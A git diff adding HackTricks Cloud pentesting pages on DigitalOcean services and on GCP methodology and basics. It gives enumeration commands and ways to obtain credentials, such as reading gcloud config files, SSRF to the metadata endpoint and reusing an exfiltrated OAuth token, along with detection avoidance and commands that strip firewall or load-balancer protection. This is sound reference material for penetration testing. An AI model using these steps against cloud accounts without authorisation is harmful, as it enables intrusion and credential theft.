+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### Domains
+
+```bash
+doctl compute domain list
+doctl compute domain records list <domain>
+# You can also create records
+```
+
+### Reserverd IPs
+
+```bash
+doctl compute reserved-ip list
+doctl compute reserved-ip-action unassign <ip>
+```
+
+### Load Balancers
+
+```bash
+doctl compute load-balancer list
+doctl compute load-balancer remove-droplets <id> --droplet-ids 12,33
+doctl compute load-balancer add-forwarding-rules <id> --forwarding-rules entry_protocol:tcp,entry_port:3306,...
+```
+
+### VPC
+
+```
+doctl vpcs list
+```
+
+### Firewall
+
+{% hint style="danger" %}
+By default **droplets are created WITHOUT A FIREWALL** (not like in oder clouds such as AWS or GCP). So if you want DO to protect the ports of the droplet (VM), you need to **create it and attach it**.
+{% endhint %}
+
+```bash
+doctl compute firewall list
+doctl compute firewall list-by-droplet <droplet-id>
+doctl compute firewall remove-droplets <fw-id> --droplet-ids <droplet-id>
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md
new file mode 100644
index 0000000000..bc82b2449a
--- /dev/null
+++ b/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md
@@ -0,0 +1,49 @@
+# DO - Projects
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+> project is just a container for all the **services** (droplets, spaces, databases, kubernetes...) **running together inside of it**.\
+> For more info check:
+
+{% content-ref url="../do-basic-information.md" %}
+[do-basic-information.md](../do-basic-information.md)
+{% endcontent-ref %}
+
+### Enumeration
+
+It's possible to **enumerate all the projects a user have access to** and all the resources that are running inside a project very easily:
+
+```bash
+doctl projects list # Get projects
+doctl projects resources list <proj-id> # Get all the resources of a project
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md
new file mode 100644
index 0000000000..a19a48b8f1
--- /dev/null
+++ b/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md
@@ -0,0 +1,72 @@
+# DO - Spaces
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+DigitalOcean Spaces are **object storage services**. They allow users to **store and serve large amounts of data**, such as images and other files, in a scalable and cost-effective way. Spaces can be accessed via the DigitalOcean control panel, or using the DigitalOcean API, and are integrated with other DigitalOcean services such as Droplets (virtual private servers) and Load Balancers.
+
+### Access
+
+Spaces can be **public** (anyone can access them from the Internet) or **private** (only authorised users). To access the files from a private space outside of the Control Panel, we need to generate an **access key** and **secret**. These are a pair of random tokens that serve as a **username** and **password** to grant access to your Space.
+
+A **URL of a space** looks like this: **`https://uniqbucketname.fra1.digitaloceanspaces.com/`**\
+Note the **region** as **subdomain**.
+
+Even if the **space** is **public**, **files** **inside** of it can be **private** (you will be able to access them only with credentials).
+
+However, **even** if the file is **private**, from the console it's possible to share a file with a link such as `https://fra1.digitaloceanspaces.com/uniqbucketname/filename?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=DO00PL3RA373GBV4TRF7%2F20221213%2Ffra1%2Fs3%2Faws4_request&X-Amz-Date=20221213T121017Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Signature=6a183dbc42453a8d30d7cd2068b66aeb9ebc066123629d44a8108115def975bc` for a period of time:
+
+<figure><img src="../../../.gitbook/assets/image (277).png" alt=""><figcaption></figcaption></figure>
+
+### Enumeration
+
+```bash
+# Unauthenticated
+## Note how the region is specified in the endpoint
+aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com --no-sign-request s3://uniqbucketname
+
+# Authenticated
+## Configure spaces keys as AWS credentials
+aws configure
+AWS Access Key ID [None]: <spaces_key>
+AWS Secret Access Key [None]: <Secret>
+Default region name [None]:
+Default output format [None]:
+
+## List all buckets in a region
+aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com
+
+## List files inside a bucket
+aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com s3://uniqbucketname
+
+## It's also possible to generate authorized access to buckets from the API
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md
new file mode 100644
index 0000000000..ce5d000adc
--- /dev/null
+++ b/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md
@@ -0,0 +1,41 @@
+# DO - Volumes
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+DigitalOcean volumes are **block storage** devices that can be **attached to and detached from Droplets**. Volumes are useful for **storing data** that needs to **persist** independently of the Droplet itself, such as databases or file storage. They can be resized, attached to multiple Droplets, and snapshot for backups.
+
+### Enumeration
+
+```
+compute volume list
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/README.md b/pentesting-cloud/gcp-security/README.md
new file mode 100644
index 0000000000..5cf35ed29c
--- /dev/null
+++ b/pentesting-cloud/gcp-security/README.md
@@ -0,0 +1,273 @@
+# GCP Pentesting
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+**Before start pentesting** a **GCP** environment, there are a few **basics things you need to know** about how it works to help you understand what you need to do, how to find misconfigurations and how to exploit them.
+
+Concepts such as **organization** hierarchy, **permissions** and other basic concepts are explained in:
+
+{% content-ref url="gcp-basic-information/" %}
+[gcp-basic-information](gcp-basic-information/)
+{% endcontent-ref %}
+
+## Labs to learn
+
+* [https://gcpgoat.joshuajebaraj.com/](https://gcpgoat.joshuajebaraj.com/)
+* [https://github.com/ine-labs/GCPGoat](https://github.com/ine-labs/GCPGoat)
+* [https://github.com/lacioffi/GCP-pentest-lab/](https://github.com/lacioffi/GCP-pentest-lab/)
+* [https://github.com/carlospolop/gcp\_privesc\_scripts](https://github.com/carlospolop/gcp_privesc_scripts)
+
+## GCP Pentester/Red Team Methodology
+
+In order to audit a GCP environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal GCP services an **external services** connected.
+
+From a Red Team point of view, the **first step to compromise a GCP environment** is to manage to obtain some **credentials**. Here you have some ideas on how to do that:
+
+* **Leaks** in github (or similar) - OSINT
+* **Social** Engineering (Check the page [**Workspace Security**](../workspace-security/))
+* **Password** reuse (password leaks)
+* Vulnerabilities in GCP-Hosted Applications
+  * [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint
+  * **Local File Read**
+    * `/home/USERNAME/.config/gcloud/*`
+    * `C:\Users\USERNAME\.config\gcloud\*`
+* 3rd parties **breached**
+* **Internal** Employee
+
+Or by **compromising an unauthenticated service** exposed:
+
+{% content-ref url="gcp-unauthenticated-enum-and-access/" %}
+[gcp-unauthenticated-enum-and-access](gcp-unauthenticated-enum-and-access/)
+{% endcontent-ref %}
+
+Or if you are doing a **review** you could just **ask for credentials** with these roles:
+
+{% content-ref url="gcp-permissions-for-a-pentest.md" %}
+[gcp-permissions-for-a-pentest.md](gcp-permissions-for-a-pentest.md)
+{% endcontent-ref %}
+
+{% hint style="info" %}
+After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration:
+{% endhint %}
+
+## Basic Enumeration
+
+### **SSRF**
+
+For more information about how to **enumerate GCP metadata** check the following hacktricks page:
+
+{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#6440" %}
+
+### Whoami
+
+In GCP you can try several options to try to guess who you are:
+
+{% code overflow="wrap" %}
+```bash
+#If you are inside a compromise machine
+gcloud auth list
+curl -H "Content-Type: application/x-www-form-urlencoded" -d "access_token=$(gcloud auth print-access-token)" https://www.googleapis.com/oauth2/v1/tokeninfo
+gcloud auth print-identity-token #Get info from the token
+
+#If you compromised a metadata token or somehow found an OAuth token
+curl -H "Content-Type: application/x-www-form-urlencoded" -d "access_token=<token>" https://www.googleapis.com/oauth2/v1/tokeninfo
+```
+{% endcode %}
+
+You can also use the API endpoint `/userinfo` to get more info about the user:
+
+{% code overflow="wrap" %}
+```bash
+curl -H "Content-Type: application/x-www-form-urlencoded" -H "Authorization: OAuth $(gcloud auth print-access-token)" https://www.googleapis.com/oauth2/v1/userinfo
+
+curl -H "Content-Type: application/x-www-form-urlencoded" -H "Authorization: OAuth <access_token>" https://www.googleapis.com/oauth2/v1/userinfo
+```
+{% endcode %}
+
+### Org Enumeration
+
+```bash
+# Get organizations
+gcloud organizations list #The DIRECTORY_CUSTOMER_ID is the Workspace ID
+gcloud resource-manager folders list --organization <org_number> # Get folders
+gcloud projects list # Get projects
+```
+
+### Principals & IAM Enumeration
+
+If you have enough permissions, **checking the privileges of each entity inside the GCP account** will help you understand what you and other identities can do and how to **escalate privileges**.
+
+If you don't have enough permissions to enumerate IAM, you can **steal brute-force them** to figure them out.\
+Check **how to do the numeration and brute-forcing** in:
+
+{% content-ref url="gcp-services/gcp-iam-and-org-policies-enum.md" %}
+[gcp-iam-and-org-policies-enum.md](gcp-services/gcp-iam-and-org-policies-enum.md)
+{% endcontent-ref %}
+
+{% hint style="info" %}
+Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\
+In the following section you can check some ways to **enumerate some common services.**
+{% endhint %}
+
+## Services Enumeration
+
+GCP has an astonishing amount of services, in the following page you will find **basic information, enumeration** cheatsheets, how to **avoid detection**, obtain **persistence**, and other **post-exploitation** tricks about some of them:
+
+{% content-ref url="gcp-services/" %}
+[gcp-services](gcp-services/)
+{% endcontent-ref %}
+
+Note that you **don't** need to perform all the work **manually**, below in this post you can find a **section about** [**automatic tools**](./#automatic-tools).
+
+Moreover, in this stage you might discovered **more services exposed to unauthenticated users,** you might be able to exploit them:
+
+{% content-ref url="gcp-unauthenticated-enum-and-access/" %}
+[gcp-unauthenticated-enum-and-access](gcp-unauthenticated-enum-and-access/)
+{% endcontent-ref %}
+
+## Privilege Escalation, Post Exploitation & Persistence
+
+The most common way once you have obtained some cloud credentials or have compromised some service running inside a cloud is to **abuse misconfigured privileges** the compromised account may have. So, the first thing you should do is to enumerate your privileges.
+
+Moreover, during this enumeration, remember that **permissions can be set at the highest level of "Organization"** as well.
+
+{% content-ref url="gcp-privilege-escalation/" %}
+[gcp-privilege-escalation](gcp-privilege-escalation/)
+{% endcontent-ref %}
+
+{% content-ref url="gcp-post-exploitation/" %}
+[gcp-post-exploitation](gcp-post-exploitation/)
+{% endcontent-ref %}
+
+{% content-ref url="gcp-persistence/" %}
+[gcp-persistence](gcp-persistence/)
+{% endcontent-ref %}
+
+### Publicly Exposed Services
+
+While enumerating GCP services you might have found some of them **exposing elements to the Internet** (VM/Containers ports, databases or queue services, snapshots or buckets...).\
+As pentester/red teamer you should always check if you can find **sensitive information / vulnerabilities** on them as they might provide you **further access into the AWS account**.
+
+In this book you should find **information** about how to find **exposed GCP services and how to check them**. About how to find **vulnerabilities in exposed network services** I would recommend you to **search** for the specific **service** in:
+
+{% embed url="https://book.hacktricks.xyz/" %}
+
+## GCP <--> Workspace Pivoting
+
+**Compromising** principals in **one** platform might allow an attacker to **compromise the other one**, check it in:
+
+{% content-ref url="gcp-to-workspace-pivoting/" %}
+[gcp-to-workspace-pivoting](gcp-to-workspace-pivoting/)
+{% endcontent-ref %}
+
+## Automatic Tools
+
+* In the **GCloud console**, in [https://console.cloud.google.com/iam-admin/asset-inventory/dashboard](https://console.cloud.google.com/iam-admin/asset-inventory/dashboard) you can see resources and IAMs being used by project.
+  * Here you can see the assets supported by this API: [https://cloud.google.com/asset-inventory/docs/supported-asset-types](https://cloud.google.com/asset-inventory/docs/supported-asset-types)
+* Check **tools** that can be [**used in several clouds here**](../pentesting-cloud-methodology.md).
+* [**gcp\_scanner**](https://github.com/google/gcp_scanner): This is a GCP resource scanner that can help determine what **level of access certain credentials posses** on GCP.
+
+```bash
+# Install
+git clone https://github.com/google/gcp_scanner.git
+cd gcp_scanner
+virtualenv -p python3 venv
+source venv/bin/activate
+pip install -r requirements.txt
+# Execute with gcloud creds
+python3 __main__.py -o /tmp/output/ -g "$HOME/.config/gcloud"
+```
+
+* [**gcp\_enum**](https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gcp_enum): Bash script to enumerate a GCP environment using gcloud cli and saving the results in a file.
+* [**GCP-IAM-Privilege-Escalation**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation): Scripts to enumerate high IAM privileges and to escalate privileges in GCP abusing them (I couldn’t make run the enumerate script).
+* [**BF My GCP Permissions**](https://github.com/carlospolop/bf_my_gcp_permissions): Script to bruteforce your permissions.
+
+## gcloud config & debug
+
+```bash
+# Login so gcloud can use your credentials
+gcloud auth login
+gcloud config set project security-devbox
+gcloud auth print-access-token
+
+# Login so SDKs can use your user credentials
+gcloud auth application-default login
+gcloud auth application-default set-quota-project security-devbox
+gcloud auth application-default print-access-token
+
+# Update gcloud
+gcloud components update
+```
+
+### Capture gcloud, gsutil... network
+
+Remember that you can use the **parameter** **`--log-http`** with the **`gcloud`** cli to **print** the **requests** the tool is performing. If you don't want the logs to redact the token value use `gcloud config set log_http_redact_token false`
+
+Moreover, to intercept the communication:
+
+```bash
+gcloud config set proxy/address 127.0.0.1
+gcloud config set proxy/port 8080
+gcloud config set proxy/type http
+gcloud config set auth/disable_ssl_validation True
+
+# If you don't want to completely disable ssl_validation use:
+gcloud config set core/custom_ca_certs_file cert.pem
+
+# Back to normal
+gcloud config unset proxy/address
+gcloud config unset proxy/port
+gcloud config unset proxy/type
+gcloud config unset auth/disable_ssl_validation
+gcloud config unset core/custom_ca_certs_file
+```
+
+### OAuth token configure in gcloud
+
+In order to **use an exfiltrated service account OAuth token from the metadata endpoint** you can just do:
+
+```bash
+# Via env vars
+export CLOUDSDK_AUTH_ACCESS_TOKEN=<token>
+gcloud projects list
+
+# Via setup
+echo "<token>" > /some/path/to/token
+gcloud config set auth/access_token_file /some/path/to/token
+gcloud projects list
+gcloud config unset auth/access_token_file
+```
+
+## References
+
+* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-basic-information/README.md b/pentesting-cloud/gcp-security/gcp-basic-information/README.md
new file mode 100644
index 0000000000..4adbc2a482
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-basic-information/README.md
@@ -0,0 +1,260 @@
+# GCP - Basic Information
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## **Resource hierarchy**
+
+Google Cloud uses a [Resource hierarchy](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy) that is similar, conceptually, to that of a traditional filesystem. This provides a logical parent/child workflow with specific attachment points for policies and permissions.
+
+At a high level, it looks like this:
+
+```
+Organization
+--> Folders
+  --> Projects
+    --> Resources
+```
+
+A virtual machine (called a Compute Instance) is a resource. A resource resides in a project, probably alongside other Compute Instances, storage buckets, etc.
+
+<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption><p><a href="https://cloud.google.com/static/resource-manager/img/cloud-hierarchy.svg">https://cloud.google.com/static/resource-manager/img/cloud-hierarchy.svg</a></p></figcaption></figure>
+
+## **Projects Migration**
+
+It's possible to **migrate a project without any organization** to an organization with the permissions `roles/resourcemanager.projectCreator` and `roles/resourcemanager.projectMover`. If the project is inside other organization, it's needed to contact GCP support to **move them out of the organization first**. For more info check [**this**](https://medium.com/google-cloud/migrating-a-project-from-one-organization-to-another-gcp-4b37a86dd9e6).
+
+## **Organization Policies**
+
+Allow to centralize control over your organization's cloud resources:
+
+* Centralize control to **configure restrictions** on how your organization’s resources can be used.
+* Define and establish **guardrails** for your development teams to stay within compliance boundaries.
+* Help project owners and their teams move quickly without worry of breaking compliance.
+
+These policies can be created to **affect the complete organization, folder(s) or project(s)**. Descendants of the targeted resource hierarchy node **inherit the organization policy**.
+
+In order to **define** an organization policy, **you choose a** [**constraint**](https://cloud.google.com/resource-manager/docs/organization-policy/overview#constraints), which is a particular type of restriction against either a Google Cloud service or a group of Google Cloud services. You **configure that constraint with your desired restrictions**.
+
+<figure><img src="../../../.gitbook/assets/image (217).png" alt=""><figcaption><p><a href="https://cloud.google.com/resource-manager/img/org-policy-concepts.svg">https://cloud.google.com/resource-manager/img/org-policy-concepts.svg</a></p></figcaption></figure>
+
+#### Common use cases <a href="#common_use_cases" id="common_use_cases"></a>
+
+* Limit resource sharing based on domain.
+* Limit the usage of Identity and Access Management service accounts.
+* Restrict the physical location of newly created resources.
+* Disable service account creation
+
+<figure><img src="../../../.gitbook/assets/image (172).png" alt=""><figcaption></figcaption></figure>
+
+There are many more constraints that give you fine-grained control of your organization's resources. For **more information, see the** [**list of all Organization Policy Service constraints**](https://cloud.google.com/resource-manager/docs/organization-policy/org-policy-constraints)**.**
+
+### **Default Organization Policies**
+
+<details>
+
+<summary>These are the policies that Google will add by default when setting up your GCP organization:</summary>
+
+**Access Management Policies**
+
+* **Domain restricted contacts:** Prevents adding users to Essential Contacts outside your specified domains. This limits Essential Contacts to only allow managed user identities in your selected domains to receive platform notifications.
+* **Domain restricted sharing:** Prevents adding users to IAM policies outside your specified domains. This limits IAM policies to only allow managed user identities in your selected domains to access resources inside this organization.
+* **Public access prevention:** Prevents Cloud Storage buckets from being exposed to the public. This ensures that a developer can't configure Cloud Storage buckets to have unauthenticated internet access.
+* **Uniform bucket level access:** Prevents object-level access control lists (ACLs) in Cloud Storage buckets. This simplifies your access management by applying IAM policies consistently across all objects in Cloud Storage buckets.
+* **Require OS login:** VMs created in new projects will have OS Login enabled. This lets you manage SSH access to your instances using IAM without needing to create and manage individual SSH keys.
+
+**Additional security policies for service accounts**
+
+* **Disable automatic IAM grants**: Prevents the default App Engine and Compute Engine service accounts from automatically being granted the Editor IAM role on a project at creation. This ensures service accounts don't receive overly-permissive IAM roles upon creation.
+* **Disable service account key creation**: Prevents the creation of public service account keys. This helps reduce the risk of exposing persistent credentials.
+* **Disable service account key upload**: Prevents the uploading of public service account keys. This helps reduce the risk of leaked or reused key material.
+
+**Secure VPC network configuration policies**
+
+* **Define allowed external IPs for VM instances**: Prevents the creation of Compute instances with a public IP, which can expose them to internet traffic.
+
+- **Disable VM nested virtualization**: Prevents the creation of nested VMs on Compute Engine VMs. This decreases the security risk of having unmonitored nested VMs.
+
+* **Disable VM serial port:** Prevents serial port access to Compute Engine VMs. This prevents input to a server’s serial port using the Compute Engine API.
+
